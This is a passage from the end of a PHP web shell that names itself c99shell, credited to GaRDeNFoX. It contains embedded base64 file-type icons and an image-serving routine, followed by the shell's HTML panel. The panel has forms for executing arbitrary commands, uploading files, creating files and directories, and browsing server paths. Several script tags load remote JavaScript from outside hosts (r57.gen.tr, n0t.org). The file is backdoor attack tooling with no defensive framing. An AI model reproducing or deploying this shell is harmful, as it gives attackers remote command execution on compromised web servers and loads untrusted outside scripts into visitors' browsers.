  2763. "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
  2764. "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
  2765. "a00AjYYBbc/o9HjNniUAADs=",
  2766. "ext_lnk"=>
  2767. "R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
  2768. "NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
  2769. "Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
  2770. "AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
  2771. "MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
  2772. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2773. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2774. "AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
  2775. "NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
  2776. "1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
  2777. "ADs=",
  2778. "ext_log"=>
  2779. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
  2780. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
  2781. "zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
  2782. "ext_php"=>
  2783. "R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
  2784. "t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
  2785. "ext_pl"=>
  2786. "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
  2787. "GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
  2788. "ext_swf"=>
  2789. "R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
  2790. "nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
  2791. "ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
  2792. "GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
  2793. "NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
  2794. "ext_tar"=>
  2795. "R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
  2796. "Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
  2797. "HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
  2798. "UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
  2799. "uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2800. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2801. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2802. "AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
  2803. "GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
  2804. "HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
  2805. "u4tLAgEAOw==",
  2806. "ext_txt"=>
  2807. "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
  2808. "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
  2809. "UpPWG3Ig6Hq/XmRjuZwkAAA7",
  2810. "ext_wri"=>
  2811. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
  2812. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
  2813. "a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
  2814. "ext_xml"=>
  2815. "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
  2816. "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2817. "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
  2818. "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
  2819. "IQA7"
  2820. );
  2821. //For simple size- and speed-optimization.
  2822. $imgequals = array(
  2823. "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
  2824. "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
  2825. "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
  2826. "ext_html"=>array("ext_html","ext_htm"),
  2827. "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
  2828. "ext_lnk"=>array("ext_lnk","ext_url"),
  2829. "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
  2830. "ext_doc"=>array("ext_doc","ext_dot"),
  2831. "ext_js"=>array("ext_js","ext_vbs"),
  2832. "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
  2833. "ext_wri"=>array("ext_wri","ext_rtf"),
  2834. "ext_swf"=>array("ext_swf","ext_fla"),
  2835. "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
  2836. "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
  2837. );
  2838. if (!$getall)
  2839. {
  2840. header("Content-type: image/gif");
  2841. header("Cache-control: public");
  2842. header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  2843. header("Cache-control: max-age=".(60*60*24*7));
  2844. header("Last-Modified: ".date("r",filemtime(__FILE__)));
  2845. foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
  2846. if (empty($images[$img])) {$img = "small_unk";}
  2847. if (in_array($img,$ext_tar)) {$img = "ext_tar";}
  2848. echo base64_decode($images[$img]);
  2849. }
  2850. else
  2851. {
  2852. foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
  2853. natsort($images);
  2854. $k = array_keys($images);
  2855. echo "<center>";
  2856. foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
  2857. echo "</center>";
  2858. }
  2859. exit;
  2860. }
  2861. if ($act == "about") {echo "<center><b>Credits:<br>www.xxx.org<br>xxx<br></b>";}
  2862. ?>
  2863. <SCRIPT SRC=http://r57.gen.tr/yazciz/ciz.js></SCRIPT>
  2864. </td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
  2865. <tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr>
  2866. <tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type="hidden" name="cmd_txt" value="1">&nbsp;<input type="submit" name="submit" value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type="hidden" name="cmd_txt" value="1">&nbsp;<input type="submit" name="submit" value="Execute"></form></td></tr></TABLE>
  2867. <br>
  2868. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
  2869. <tr><SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
  2870. <SCRIPT SRC=http://www.n0t.org/yazciz/ciz.js></SCRIPT>
  2871. <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type="hidden" name="act" value="search"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1" checked> - regexp&nbsp;<input type="submit" name="submit" value="Search"></form></center></p></td>
  2872. <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type="hidden" name="act" value="upload"><input type="file" name="uploadfile"><input type="hidden" name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?>
  2873. </form></center></td>
  2874. </tr>
  2875. </table>
  2876. <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form method="POST"><input type="hidden" name="act" value="mkdir"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type="submit" value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type="hidden" name="act" value="mkfile"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type="hidden" name="ft" value="edit">&nbsp;<input type="submit" value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
  2877. <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo htmlspecialchars($surl); ?>"><input type="hidden" name="act" value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type="submit" value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo htmlspecialchars($surl); ?>"><input type="hidden" name="act" value="gofile"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type="submit" value="Go"></form></center></td></tr></table>
  2878. <br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>powered by</b></u></a> GaRDeNFoX | <a href="http://www.spygrup.org"><font color="#FF0000">GaRDeNFoX</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
  2879. </body></html><?php chdir($lastdir); exit; ?>
  2880.